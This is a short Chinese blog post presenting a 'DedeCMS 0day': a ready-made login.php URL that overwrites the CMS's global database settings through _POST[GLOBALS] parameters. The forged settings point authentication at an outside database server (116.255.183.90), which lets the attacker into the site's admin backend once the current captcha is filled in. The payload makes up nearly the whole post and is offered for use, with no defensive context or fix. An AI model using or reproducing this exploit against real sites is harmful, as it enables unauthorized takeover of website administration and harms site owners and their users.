当前位置: 首页 > PHP, 漏洞列表, 编程语言 > 正文

织梦网dedecms 0day

把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。

http://www.123.com/织梦网站后台/login.php?dopost=login

&validate=dcug&userid=admin&pwd=inimda

&_POST[GLOBALS][cfg_dbhost]=116.255.183.90

&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0

&_POST[GLOBALS][cfg_dbname]=root


本文固定链接: http://www.chnpanda.com/537.html | 熊猫博客 | 转载请注明出处,谢谢合作!

本文关键字:

织梦网dedecms 0day:等您坐沙发呢!

发表评论

亲,不支持纯字母、符号评论哦~